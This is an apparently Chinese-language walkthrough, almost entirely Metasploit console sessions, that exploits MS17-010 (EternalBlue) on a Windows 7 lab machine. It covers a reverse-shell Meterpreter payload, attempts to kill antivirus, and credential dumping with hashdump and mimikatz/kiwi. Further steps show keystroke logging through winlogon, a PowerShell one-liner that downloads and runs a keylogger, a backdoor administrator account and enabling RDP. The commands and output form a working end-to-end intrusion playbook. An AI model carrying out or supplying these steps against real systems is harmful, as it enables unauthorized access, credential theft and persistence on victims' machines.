• 永恒之蓝ms17-010的利用







    1. 使用关键字17-010在metasploit中查找
    msf5 > search 17-010
    Matching Modules
       #  Name                                           Disclosure Date  Rank     Check  Description
       -  ----                                           ---------------  ----     -----  -----------
       1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
       3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
       5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
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    1. 使用辅助模块auxiliary中的auxiliary/scanner/smb/smb_ms17_010验证是否存在漏洞
    msf5 > use auxiliary/scanner/smb/smb_ms17_010
    msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
    Module options (auxiliary/scanner/smb/smb_ms17_010):
       Name         Current Setting                                                 Required  Description
       ----         ---------------                                                 --------  -----------
       CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
       CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
       CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
       NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
       RHOSTS                                                                       yes       The target address range or CIDR identifier
       RPORT        445                                                             yes       The SMB service port (TCP)
       SMBDomain    .                                                               no        The Windows domain to use for authentication
       SMBPass                                                                      no        The password for the specified username
       SMBUser                                                                      no        The username to authenticate as
       THREADS      1                                                               yes       The number of concurrent threads
    msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts
    rhosts =>
    msf5 auxiliary(scanner/smb/smb_ms17_010) > run
    [+]     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
    [*]     - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
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    可以看到"Host is likely VULNERABLE to MS17-010!…",说明漏洞存在。

    1. 利用漏洞反弹shell,获取meterpreter


    msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
    Module options (exploit/windows/smb/ms17_010_eternalblue):
       Name           Current Setting  Required  Description
       ----           ---------------  --------  -----------
       RHOSTS                          yes       The target address range or CIDR identifier
       RPORT          445              yes       The target port (TCP)
       SMBDomain      .                no        (Optional) The Windows domain to use for authentication
       SMBPass                         no        (Optional) The password for the specified username
       SMBUser                         no        (Optional) The username to authenticate as
       VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
       VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.
    Exploit target:
       Id  Name
       --  ----
       0   Windows 7 and Server 2008 R2 (x64) All Service Packs
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts
    rhosts =>
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost
    lhosts =>
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
    [*] Started reverse TCP handler on 
    [*] - Connecting to target for exploitation.
    [+] - Connection established for exploitation.
    [+] - Target OS selected valid for OS indicated by SMB reply
    [*] - CORE raw buffer dump (38 bytes)
    [*] - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
    [*] - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
    [*] - 0x00000020  50 61 63 6b 20 31                                Pack 1          
    [+] - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] - Trying exploit with 12 Groom Allocations.
    [*] - Sending all but last fragment of exploit packet
    [*] Sending stage (206403 bytes) to
    [*] Meterpreter session 1 opened ( -> at 2019-10-12 03:50:01 -0400
    [-] - RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationError
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    meterpreter > shell
    Process 2132 created.
    Channel 1 created.
    Microsoft Windows [�汾 6.1.7601]
    ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
    nt authority\system
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    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > 
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    meterpreter > getsystem
    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > 
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    看到"got system via technique…"字样,提权成功。


    1. 自定义字典


    1. 关闭杀毒软件
    • killav

    不要使用run killav

    meterpreter > run post/windows/manage/killav 
    [*] Attempting to terminate 'ZhuDongFangYu.exe' (PID: 1064) ...
    [-] Failed to terminate 'ZhuDongFangYu.exe' (PID: 1064).
    [*] Attempting to terminate '360Tray.exe' (PID: 3408) ...
    [-] Failed to terminate '360Tray.exe' (PID: 3408).
    [+] A total of 2 process(es) were discovered, 0 were terminated.
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > 
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    • powershell


    meterpreter > load 
    load espia       load kiwi        load peinjector  load sniffer
    load extapi      load lanattacks  load powershell  load unhook
    load incognito   load mimikatz    load python      load winpmem
    meterpreter > load powershell 
    Loading extension powershell...Success.
    meterpreter > help powershell
    Powershell Commands
        Command             Description
        -------             -----------
        powershell_execute  Execute a Powershell command string
        powershell_import   Import a PS1 script or .NET Assembly DLL
        powershell_shell    Create an interactive Powershell prompt
    meterpreter > powershell_shell 
    PS > Get-Process
    Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
    -------  ------    -----      ----- -----   ------     -- -----------
        173      20    13964       9544   117     0.23   1732 360leakfixer
        584      55    99776     105588   317     8.49   3944 360Safe
       1936     152   164724      20452   577    12.62   3408 360Tray
         32       5     1088       3100    49     0.02    696 conhost
         31       5     1084       3108    49     0.05   1448 conhost
        515      12     2100       4360    83     0.50    364 csrss
        574      15    10624      10204   178     2.64    468 csrss
        195      16     4328       6932    57     0.56   1936 dllhost
        126      14    51340      38100   130     1.05   2592 dwm
        706      49    28940      46708   247     7.92   2632 explorer
         64       7     1040       2832    35     0.03   1496 Ext2Srv
          0       0        0         24     0               0 Idle
         40       5      940       2392    21     0.00   1552 imdsksvc
        772      24     4304       8300    45     2.09    572 lsass
        204      10     2768       5024    33     0.11    580 lsm
         50       8      996       2952    47     0.03   1584 metsvc
        148      17     3476       4484    61     0.06   2192 msdtc
        257      22    51456      55128   558     0.30   1608 powershell
        271      22    51200      55432   559     0.22   3936 powershell
        778      55    34844      16556   147     1.06   2076 SearchIndexer
        228      14     5372       6572    44     2.15    556 services
        405      31     9896      14852   163     0.94   3712 sesvc
         30       2      452        776     4     0.12    276 smss
        306      31    10076      13592   137     0.98   1856 SoftMgrLite
        648      54    84828      76780   639     0.90   1284 spoolsv
        508      17     5880       7316    44     1.26    548 svchost
        361      14     4364       7272    46     2.40    688 svchost
        268      16     3840       6712    38     0.34    792 svchost
        472      23    17756      14100    84     3.07    860 svchost
        427      24    66132      68028   162    13.32    940 svchost
       1183      52    20824      24108   408     6.65    984 svchost
        571      35    14256      12320    92     1.93   1144 svchost
        143      15     2612      13328    51     0.34   1292 svchost
        257      30     5788       7968    49     0.53   1332 svchost
         94       8     1648       3592    47     0.02   1916 svchost
        103      13     1872       5000    34     0.14   1992 svchost
        314      41    61952       5296   129     0.73   2916 svchost
        646       0      112        368     3               4 System
        205      16     7412       8980    83     0.27   2504 taskhost
        127      12     3640      13272   112     7.52   3440 taskmgr
        280      23    11824        912   128     1.67   1016 updater
         87      10     5224       3744    62     0.08   1632 VGAuthService
         56       6     1436       2748    39     0.00    748 vmacthlp
        310      25    10320      11500   100     5.88   1688 vmtoolsd
        244      22    10488      15192   125     6.63   2788 vmtoolsd
         82      10     1560       3988    57     0.09    456 wininit
        118      10     2964       5708    66     0.25    520 winlogon
        230      15     7052      10468    52            1208 WmiPrvSE
        382      35    10520      10848   105     1.05   1064 ZhuDongFangYu
    PS > Stop-Process 1064
    ERROR: Stop-Process : ??????????????ZhuDongFangYu (1064)?: ?????
    ERROR: ???? ?:1 ??: 13
    ERROR: + Stop-Process <<<<  1064
    ERROR:     + CategoryInfo          : CloseError: (System.Diagnost...(ZhuDongFangYu):Process) [Stop-Process], ProcessCommandEx
    EERROR:     + FullyQualifiedErrorId : CouldNotStopProcess,Microsoft.PowerShell.Commands.StopProcessCommand
    PS > 
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    • run scraper


    meterpreter > run scraper
    [*] New session on
    [*] Gathering basic system information...
    [*] Dumping password hashes...
    [*] Obtaining the entire registry...
    [*]  Exporting HKCU
    [*]  Downloading HKCU (C:\Windows\TEMP\oksMbdKb.reg)
    [*]  Cleaning HKCU
    [*]  Exporting HKLM
    [*]  Downloading HKLM (C:\Windows\TEMP\xZUHpvAU.reg)
    [*]  Cleaning HKLM
    [*]  Exporting HKCC
    [*]  Downloading HKCC (C:\Windows\TEMP\pcrWzade.reg)
    [*]  Cleaning HKCC
    [*]  Exporting HKCR
    [*]  Downloading HKCR (C:\Windows\TEMP\AXZDmEKp.reg)
    [*]  Cleaning HKCR
    [*]  Exporting HKU
    [*]  Downloading HKU (C:\Windows\TEMP\jaOsLEOM.reg)
    [*]  Cleaning HKU
    [*] Completed processing on
    meterpreter > 
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    • run winenum

    部分结果和run scraper重复。

    meterpreter > run winenum
    [*] Running Windows Local Enumeration Meterpreter Script
    [*] New session on
    [*] Saving general report to /root/.msf4/logs/scripts/winenum/PC_20191012.5354/PC_20191012.5354.txt
    [*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/PC_20191012.5354
    [*] Checking if PC is a Virtual Machine ........
    [*] 	This is a VMware Workstation/Fusion Virtual Machine
    [*] 	UAC is Disabled
    [*] Running Command List ...
    [*] 	running command arp -a
    [*] 	running command ipconfig /displaydns
    [*] 	running command ipconfig /all
    [*] 	running command route print
    [*] 	running command cmd.exe /c set
    [*] 	running command netstat -ns
    [*] 	running command netstat -nao
    [*] 	running command net accounts
    [*] 	running command netstat -vb
    [*] 	running command net view
    [*] 	running command net localgroup
    [*] 	running command net group administrators
    [*] 	running command net session
    [*] 	running command net share
    [*] 	running command net group
    [*] 	running command net user
    [*] 	running command net view /domain
    [*] 	running command netsh firewall show config
    [*] 	running command net localgroup administrators
    [*] 	running command tasklist /svc
    [*] 	running command netsh wlan show drivers
    [*] 	running command gpresult /SCOPE USER /Z
    [*] 	running command netsh wlan show networks mode=bssid
    [*] 	running command gpresult /SCOPE COMPUTER /Z
    [*] 	running command netsh wlan show profiles
    [*] 	running command netsh wlan show interfaces
    [*] Running WMIC Commands ....
    [*] 	running command wmic group list
    [*] 	running command wmic service list brief
    [*] 	running command wmic netlogin get name,lastlogon,badpasswordcount
    [*] 	running command wmic logicaldisk get description,filesystem,name,size
    [*] 	running command wmic useraccount list
    [*] 	running command wmic netuse get name,username,connectiontype,localname
    [*] 	running command wmic nteventlog get path,filename,writeable
    [*] 	running command wmic volume list brief
    [*] 	running command wmic share get name,path
    [*] 	running command wmic netclient list brief
    [*] 	running command wmic qfe
    [*] 	running command wmic startup list full
    [*] 	running command wmic rdtoggle list
    [*] 	running command wmic product get name,version
    [*] Extracting software list from registry
    [*] Dumping password hashes...
    [*] Hashes Dumped
    [*] Getting Tokens...
    [*] All tokens have been processed
    [*] Done!
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    meterpreter > run post/windows/gather/enum_applications 
    [*] Enumerating applications installed on PC
    Installed Applications
     Name                                                            Version
     ----                                                            -------
     Advanced Archive Password Recovery                    
     Elcomsoft Forensic Disk Decryptor                     
     Ext2Fsd 0.69                                                    0.69
     Java 8 Update 121 (64-bit)                                      8.0.1210.13
     Java Auto Updater                                     
     Java SE Development Kit 8 Update 121 (64-bit)                   8.0.1210.13
     Microsoft .NET Framework 4.7.2                                  4.7.03062
     Microsoft .NET Framework 4.7.2                                  4.7.03062
     Microsoft .NET Framework 4.7.2 (CHS)                            4.7.03062
     Microsoft .NET Framework 4.7.2 (简体中文)                           4.7.03062
     Microsoft Visual C++ 2005 Redistributable                       8.0.61187
     Microsoft Visual C++ 2005 Redistributable (x64)                 8.0.61186
     Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  9.0.30729.6161
     Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  9.0.30729.4148
     Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523  9.0.30729.7523
     Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219     10.0.40219
     Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219     10.0.40219
     Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030    11.0.61030.0
     Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030    11.0.61030.0
     Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61135   11.0.61135
     Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61135      11.0.61135
     Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61135   11.0.61135
     Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61135      11.0.61135
     Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664    12.0.40664.0
     Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664    12.0.40664.0
     Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664   12.0.40664
     Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664      12.0.40664
     Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664   12.0.40664
     Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664      12.0.40664
     Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706   14.15.26706.0
     Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706   14.15.26706.0
     Microsoft Visual C++ 2017 x64 Additional Runtime - 14.15.26706  14.15.26706
     Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.15.26706     14.15.26706
     Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706  14.15.26706
     Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706     14.15.26706
     Python 2.7.13 (64-bit)                                          2.7.13150
     Python 3.7.3 Add to Path (64-bit)                               3.7.3150.0
     Python 3.7.3 Core Interpreter (64-bit)                          3.7.3150.0
     Python 3.7.3 Development Libraries (64-bit)                     3.7.3150.0
     Python 3.7.3 Documentation (64-bit)                             3.7.3150.0
     Python 3.7.3 Executables (64-bit)                               3.7.3150.0
     Python 3.7.3 Standard Library (64-bit)                          3.7.3150.0
     Python 3.7.3 Tcl/Tk Support (64-bit)                            3.7.3150.0
     Python 3.7.3 Test Suite (64-bit)                                3.7.3150.0
     Python 3.7.3 Utility Scripts (64-bit)                           3.7.3150.0
     Python 3.7.3 pip Bootstrap (64-bit)                             3.7.3150.0
     Python Launcher                                                 3.7.6657.0
     SecureCRT V6.2.3.313 汉化版                                        V6.2.3.313 汉化版
     SilentEye                                                       0.4.1
     Stellar Phoenix JPEG Repair                           
     Stellar Phoenix Photo Recovery Professional           
     Update for Microsoft .NET Framework 4.7.2 (KB4087364)           1
     Update for Microsoft .NET Framework 4.7.2 (KB4457035)           1
     VMware Tools                                          
     WinRAR 5.11 (64-位)                                              5.11.0
     Windows Mobile Connectivity Tools 10.0.15254.0 - Desktop x86    10.1.15254.1
     Windows SDK AddOn                                     
     搜狗输入法 9.1正式版                                          
    [+] Results stored in: /root/.msf4/loot/20191012053311_default_192.168.8.129_host.application_804807.txt
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    meterpreter > run post/windows/gather/enum_logged_on_users 
    [*] Running against session 1
    Current Logged Users
     SID                                           User
     ---                                           ----
     S-1-5-18                                      NT AUTHORITY\SYSTEM
     S-1-5-21-1244648496-323992457-611466280-1000  PC\XinSai
    [+] Results saved in: /root/.msf4/loot/20191012053946_default_192.168.8.129_host.users.activ_091950.txt
    Recently Logged Users
     SID                                           Profile Path
     ---                                           ------------
     S-1-5-18                                      %systemroot%\system32\config\systemprofile
     S-1-5-19                                      C:\Windows\ServiceProfiles\LocalService
     S-1-5-20                                      C:\Windows\ServiceProfiles\NetworkService
     S-1-5-21-1244648496-323992457-611466280-1000  C:\Users\XinSai
     S-1-5-21-1244648496-323992457-611466280-501   C:\Users\Guest
    meterpreter > 
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    meterpreter > hashdump
    meterpreter > 
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    格式为用户名:SID:LM哈希:NTLM哈希:::,之后可以使用类似John the Ripper等工具进行破解哈希。



    meterpreter > load 
    load espia       load kiwi        load peinjector  load sniffer
    load extapi      load lanattacks  load powershell  load unhook
    load incognito   load mimikatz    load python      load winpmem
    meterpreter > load 
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    • kiwi模块


    meterpreter > load kiwi
    Loading extension kiwi...
      .#####.   mimikatz 2.1.1 20180925 (x64/windows)
     .## ^ ##.  "A La Vie, A L'Amour"
     ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
      '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
    meterpreter > creds_all
    [+] Running as SYSTEM
    [*] Retrieving all credentials
    msv credentials
    Username  Domain  LM                                NTLM                              SHA1
    --------  ------  --                                ----                              ----
    XinSai    PC      f0d412bd764ffe81aad3b435b51404ee  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8
    wdigest credentials
    Username  Domain     Password
    --------  ------     --------
    (null)    (null)     (null)
    PC$       WORKGROUP  (null)
    XinSai    PC         admin
    tspkg credentials
    Username  Domain  Password
    --------  ------  --------
    XinSai    PC      admin
    kerberos credentials
    Username  Domain     Password
    --------  ------     --------
    (null)    (null)     (null)
    XinSai    PC         admin
    pc$       WORKGROUP  (null)
    meterpreter > 
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    • mimikatz模块


    meterpreter > help mimikatz
    Mimikatz Commands
        Command           Description
        -------           -----------
        kerberos          Attempt to retrieve kerberos creds.
        livessp           Attempt to retrieve livessp creds.
        mimikatz_command  Run a custom command.
        msv               Attempt to retrieve msv creds (hashes).
        ssp               Attempt to retrieve ssp creds.
        tspkg             Attempt to retrieve tspkg creds.
        wdigest           Attempt to retrieve wdigest creds.
    meterpreter > wdigest 
    [+] Running as SYSTEM
    [*] Retrieving wdigest credentials
    wdigest credentials
    AuthID    Package    Domain        User           Password
    ------    -------    ------        ----           --------
    0;816638  NTLM       PC            xman666        mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
    0;372325  NTLM       PC            XinSai         mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
    0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
    0;996     Negotiate  WORKGROUP     PC$            mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
    0;48926   NTLM                                    mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
    0;999     NTLM       WORKGROUP     PC$            mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
    meterpreter > 
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    • keyscan_dump





    不过在使用键盘记录功能时,通常需要跟目标进程进行绑定。下面我们会将Meterpreter跟 winlogon.exe 绑定,并在登录进程中捕获键盘记录,以获得用户的密码。

    1. 绑定进程
    meterpreter > ps
    Process List
     PID   PPID  Name                    Arch  Session  User                          Path
     ---   ----  ----                    ----  -------  ----                          ----
     0     0     [System Process]                                                     
     4     0     System                  x64   0                                      
     240   4     smss.exe                x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
     328   320   csrss.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
     340   908   dwm.exe                 x64   3                                      C:\Windows\system32\Dwm.exe
     384   524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
     412   320   wininit.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
     524   412   services.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
     540   412   lsass.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
     548   412   lsm.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
     616   524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  
     648   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
     712   524   vmacthlp.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
     744   524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  
     816   524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
     908   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
     960   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
     1032  1176  QwdqufeOMpX.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\QwdqufeOMpX.exe
     1088  4060  LogonUI.exe             x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
     1112  1176  sQoycPhez.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\sQoycPhez.exe
     1176  524   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
     1212  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
     1268  524   msdtc.exe               x64   0        NT AUTHORITY\NETWORK SERVICE  
     1320  524   Ext2Srv.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\Ext2Fsd\Ext2Srv.exe
     1364  524   imdsksvc.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\imdsksvc.exe
     1412  524   VGAuthService.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
     1456  524   vmtoolsd.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
     1584  524   taskhost.exe            x64   3                                      C:\Windows\system32\taskhost.exe
     1732  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
     1796  524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  
     1956  524   dllhost.exe             x64   0        NT AUTHORITY\SYSTEM           
     1996  648   WmiPrvSE.exe                                                         
     2284  1088  csrss.exe               x64   3        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
     2408  2732  SearchFilterHost.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchFilterHost.exe
     2496  2272  explorer.exe            x64   3                                      C:\Windows\Explorer.EXE
     2596  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
     2668  524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
     2732  524   SearchIndexer.exe       x64   0        NT AUTHORITY\SYSTEM           
     2828  1176  xmutGkHXf.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\xmutGkHXf.exe
     2840  1176  TeyQCXoY.exe            x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\TeyQCXoY.exe
     3020  1176  plKeHIXhzUQQ.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\plKeHIXhzUQQ.exe
     3220  1176  maBudFEovnC.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\maBudFEovnC.exe
     3384  1176  wLBliAR.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\wLBliAR.exe
     3456  2912  csrss.exe               x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
     3748  816   audiodg.exe             x64   0                                      
     3784  2732  SearchProtocolHost.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchProtocolHost.exe
     3944  2496  vmtoolsd.exe            x64   3                                      C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
     4024  1176  dtUmbNlfMa.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\dtUmbNlfMa.exe
     4060  2912  winlogon.exe            x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
    meterpreter > getpid
    Current pid: 1176
    meterpreter > 
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    meterpreter > migrate 4060
    [*] Migrating from 1176 to 4060...
    [*] Migration completed successfully.
    meterpreter > getpid
    Current pid: 4060
    meterpreter > 
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    1. 键盘监听
    meterpreter > keyscan_start
    Starting the keystroke sniffer ...
    meterpreter > 
    • 1
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    meterpreter > keyscan_dump 
    Dumping captured keystrokes...
    meterpreter > keyscan_stop
    Stopping the keystroke sniffer...
    meterpreter > 
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    • keylogrecorder
    meterpreter > run keylogrecorder -h
    [!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
    [!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
    Keylogger Recorder Meterpreter Script
    This script will start the Meterpreter Keylogger and save all keys
    in a log file for later anlysis. To stop capture hit Ctrl-C
        -c   Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration.  Default is 2.
        -h        Help menu.
        -k        Kill old Process
        -l        Lock screen when capturing Winlogon credentials.
        -t   Time interval in seconds between recollection of keystrokes, default 30 seconds.
    meterpreter > run keylogrecorder -c 0
    [!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
    [!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
    [*] 	explorer.exe Process found, migrating into 2764
    [*] Migration Successful!!
    [*] 	explorer.exe Process found, migrating into 928
    meterpreter > run keylogrecorder -c 0
    [!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
    [!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
    meterpreter > 
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    • Get-Keystrokes


    PS D:\> Import-Module .\Get-Keystrokes.ps1
    PS D:\> Get-Keystrokes -LogPath c:\windows\temp\key.log
    PS D:\> 
    • 1
    • 2
    • 3



    PS D:\> iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-Keystrokes.ps1’); Get-Keystrokes –Logpath c:\windows\temp\key.log
    • 1
    • 2


    • run getgui
    meterpreter > run getgui -u xman666 -p admin
    [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
    [!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
    [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
    [*] Carlos Perez carlos_perez@darkoperator.com
    [*] Setting user account for logon
    [*] 	Adding User: xman666 with Password: admin
    [-] Account could not be created
    [-] Error:
    [-] 	命令成功完成。
    [*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.2058.rc
    meterpreter > shell
    Process 4020 created.
    Channel 54 created.
    Microsoft Windows [版本 6.1.7601]
    版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
    C:\Windows\system32>net user xman666
    net user xman666
    用户名                 xman666
    国家/地区代码          000 (系统默认值)
    帐户启用               Yes
    帐户到期               从不
    上次设置密码           2019/10/13 11:20:58
    密码到期               2019/11/24 11:20:58
    密码可更改             2019/10/13 11:20:58
    需要密码               Yes
    用户可以更改密码       Yes
    允许的工作站           All
    上次登录               从不
    可允许的登录小时数     All
    本地组成员             *Users                
    全局组成员             *None                 
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    • 命令行
    meterpreter > shell
    Process 2816 created.
    Channel 52 created.
    Microsoft Windows [版本 6.1.7601]
    版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
    nt authority\system
    C:\Windows\system32>net user
    net user
    \\ 的用户帐户
    Administrator            Guest                    XinSai                   
    C:\Windows\system32>net user test test /add
    net user test test /add
    C:\Windows\system32>net user
    net user
    \\ 的用户帐户
    Administrator            Guest                    test                     
    XinSai                   xman666                  
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    C:\Windows\system32>net user test
    net user test
    用户名                 test
    国家/地区代码          000 (系统默认值)
    帐户启用               Yes
    帐户到期               从不
    上次设置密码           2019/10/13 11:11:32
    密码到期               2019/11/24 11:11:32
    密码可更改             2019/10/13 11:11:32
    需要密码               Yes
    用户可以更改密码       Yes
    允许的工作站           All
    上次登录               2019/10/13 11:12:03
    可允许的登录小时数     All
    本地组成员             *Users                
    全局组成员             *None                 
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    C:\Windows\system32>net localgroup administrators test /add
    net localgroup administrators test /add
    C:\Windows\system32>net user test
    net user test
    用户名                 test
    国家/地区代码          000 (系统默认值)
    帐户启用               Yes
    帐户到期               从不
    上次设置密码           2019/10/13 11:11:32
    密码到期               2019/11/24 11:11:32
    密码可更改             2019/10/13 11:11:32
    需要密码               Yes
    用户可以更改密码       Yes
    允许的工作站           All
    上次登录               2019/10/13 11:12:03
    可允许的登录小时数     All
    本地组成员             *Administrators       *Users                
    全局组成员             *None                 
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    1. 开启远程桌面rdp
    meterpreter > run post/windows/manage/enable_rdp 
    [*] Enabling Remote Desktop
    [*] 	RDP is disabled; enabling it ...
    [*] Setting Terminal Services service startup mode
    [*] 	The Terminal Services service is not set to auto, changing it to auto ...
    [*] 	Opening port in local firewall if necessary
    [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20191012054909_default_192.168.8.129_host.windows.cle_038774.txt
    meterpreter > 
